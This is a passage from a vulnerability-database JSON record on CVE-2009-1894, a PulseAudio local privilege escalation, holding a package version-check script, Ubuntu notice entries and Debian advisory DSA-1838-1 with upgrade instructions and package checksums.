rpm:\"pulseaudio-module-jack~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2022-01-04T13:26:36", "description": "Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that PulseAudio did not \nsafely re-execute itself. A local attacker could exploit this to gain \nroot privileges.\n", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "ubuntu", "title": "PulseAudio vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-16T00:00:00", "id": "USN-804-1", "href": "https://ubuntu.com/security/notices/USN-804-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:59:35", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users\nto gain privileges via vectors involving creation of a hard link, related\nto the application setting LD_BIND_NOW to 1, and then calling execv on the\ntarget of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T00:00:00", "type": "ubuntucve", "title": "CVE-2009-1894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-17T00:00:00", "id": "UB:CVE-2009-1894", "href": "https://ubuntu.com/security/CVE-2009-1894", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-22T01:07:47", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1838-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 18, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : pulseaudio\nVulnerability : privilege escalation\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2009-1894\nDebian Bug : 537351\n\nTavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1.tar.gz\n Size/MD5 checksum: 1098761 e965d6170caf1b816a51e490f8bb8f49\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1.dsc\n Size/MD5 checksum: 2302 982ec7228b8b5e2429be61e601f9be78\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 70102 d25d7e00b3abd0d6db30f367b2c1588c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 80650 662d3cc6c33797509981c86aa2afa33f\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 198044 636571c01f35464050c342763ecd4743\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 383882 2ba1337b6e4b6e63972a63a5cd28c8b7\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 68744 91d11ae4e02af5e5cbc055abe9a3b28c\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 407796 9d7f897db38e9ba8eaa0d043ae0714e8\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 69618 ca807ed9ee62e4df968482c0d3207def\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 66140 d92032d26f5dfbecd48d01727d15b05a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 58652 993367567f24558d9a23fa741254dd42\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 82050 c2a27269fe5c81c1b449f6cb03f0baec\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 68054 2aaf0fc7b38718792714ebbce7316b2d\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 98628 ec19c6873cf7e7dc181153a63c74a749\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 64750 8a8e9f168dfd19cea9fa22df2fd0e3d8\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 77078 12ebdb1d926f8aa27734b38078e2d91c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 104850 288ec4e4329c75bb5af5ad0d81064273\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 93578 85d609a4e77fde9c1df8b5b63bd63817\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 283052 7c3bad69fba8d3e7adbaaa97771264b7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 101092 49a121ce404a243d7680960ed1e7c208\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 77628 05882b2d52ee396635383ad55e2ba420\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 348766 8e91301ccd66e2405a3b48f040a85216\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 196348 8bf48d9f9d4c090267406cce581a872f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 89626 321fd09fc9e9a4bbf447f085e0a8adee\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 475124 9aecea47e87d08e5b36da03ae145df7a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 62178 c2f3ae39e3c304e1ff8f81393ed84876\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 251952 3b899b007f39b4427e4cf87ee82caecb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 80964 acc9df7332e9177239454f336582bbfa\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_alpha.deb\n Size/MD5 checksum: 668000 863fac4de007c536f53888599f68c001\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 284080 75721adbd8ca45a55d194fb70cc753d1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 69730 133722438a5b04cfcfbed1e79b62c0b5\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 64780 537e15d120beabb902d05d4cc1580fd3\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 61746 322611ca3ee37465c9619b504d8bc694\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 77548 1895e0bae241281228033ae65787b243\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 411662 18289bef8448fe46a2b7cab9bed2673b\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 78244 593e4f3767c5f4a40623cba3dcd016bb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 70674 51294f2a9247d949c2bc5e780e4fb5ec\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 386530 e5901088f7fa33bb1524ca0cdb75bae4\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 100300 8cd949dc9c5f3c214ec7f2567c18f741\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 260996 5f1c5820feb1eb29230d04cf1868b596\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 95028 cc25475063a588489c8f331ad1db688c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 81842 a7557ed08474c226bb90263717eeeeb8\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 187364 42178f0f4dcd7d9d749af442f95086bf\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 98844 fd73f26f91e2a0803580730b821551fc\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 211228 48848026f36e5308836598a3641e0c51\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 58396 2ea48470f03b1076f2726e8144232642\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 80828 a313f4b81345c5332e9fd35af9aa8125\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 344806 ecb905673ace304c8bd83ec3c6eb2c82\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 90500 1361c331c83d87d2a47df25c47dbad05\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 68582 3d69d6c2075b6aad90606ab61d977f83\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 81122 f2d3aed1dc837ff24dced6d4c6de2954\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 68302 5f6ecbcdde78563fac6dabaf87c8f5ce\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 659782 e870bf806cc2491d946c8d4313aa60e7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 364442 df0204d1a502cc599b1bfc1901aa3b25\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 100702 817782d13f14b5fde26a25997111ab33\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_amd64.deb\n Size/MD5 checksum: 65870 dbfe1787dd10217e793884b1a8731896\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 94408 82695cdc7ca6161e295775aeea532945\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 57882 ac74c8cbb4b3b4417345d606180f0144\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 76132 5b35e4160e49fe3fd2ddc23a808c21e8\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 344618 a5131166ae2ec69597f7b54b5a24a3a0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 88702 4915d34e8e8e92431c9f7643d91477cd\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 74448 8b08fecd75aa9de32410f5016c2306bd\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 67678 126477124754818db2469b0c678ac0d1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 274428 f7849b6a736079fb7fe629d696d802e2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 67576 65804749628ab6876f40163ee9282585\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 68220 106e6628c09a4913b8d563ed40b7661b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 60644 74578075ef3a1e187ecaaa2e9b4b78db\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 315492 ce351041457590af270e28d434750c67\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 78816 27411606d41c943fe084a7de02c4e00e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 100498 6bae6db09505a76bfd9a90d6f29230ed\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 103782 6a92b357651c257ab2e827ba150d1717\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 169296 36e691ffad526d037ae93922a83f4e91\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 184716 81909d6eaac40a6988ade5e21e0d021d\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 233750 de9e3dd980787a7b243492454b565b8f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 66000 1d5864792a151b1ed054a7211eef6322\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 409580 6e92f4c213e7a93c90b5e84d94eaaaaa\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 342726 94a196eaa580b1fa6789cdd697a448bb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 64730 7e42ea8e7e11455540f58749aa2d257f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 64358 c6e956995d19645e3f1ccf0f6683fb0d\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 75122 34b94a6c7ffdb811e65681a57f74501c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 78954 4049096048b27a2c287525744617212c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 659796 156fa9c95bbadd7a5fee8f589ff2a89b\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_arm.deb\n Size/MD5 checksum: 98114 73124970da1d9ca3cd097b569bf0b512\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 66420 b4ded302d4185e611c584da489ce22fb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 71108 1cb856d4f35679fcf1a677695d945da1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 64412 90431dfe3f162f0c06bc5fa94d3404df\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 79576 0c93b66527f4b8806bef5045464af6e4\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 82798 09df90d841d768ae855939955db4abda\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 75196 7a65abd7466b47348cfd69a7b2c4b705\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 97452 d04827e5b986f6d621da1f88803025c2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 79118 585de1c54d257968c241fa8851641f4f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 67696 cf50a6fe39b759e95ba4a2f254f720ff\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 68578 881a6f37341f06ac8d7027b8b094e487\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 390604 0cecbfb4894821a6830f3521f5f8ec67\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 58936 3dd0f5b91de0091cf8aecbcc6c75eb91\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 88392 877050476a971078672ca11cab7ff82c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 394820 e686ca194c91196d71205b4bc9b5494e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 411000 0dc889c3a2f2c4896ab24af4be5bfd1c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 103568 73a67ab9becc2b57f1e4ca9c4a5eaf75\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 94954 9dde93f91a8bfe9709658068d71302cc\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 275640 fe39f81ff143794ea37ff8fe723c3cb5\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 69872 7f1dd148fa909dc7949876975040d07d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 62016 eb187cc758afc788910f2a51b0147552\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 657190 14a9f66c21bea2b4dfa316e3bf756f54\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 345480 a1769efb8182c4ce43625e791b586379\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 261368 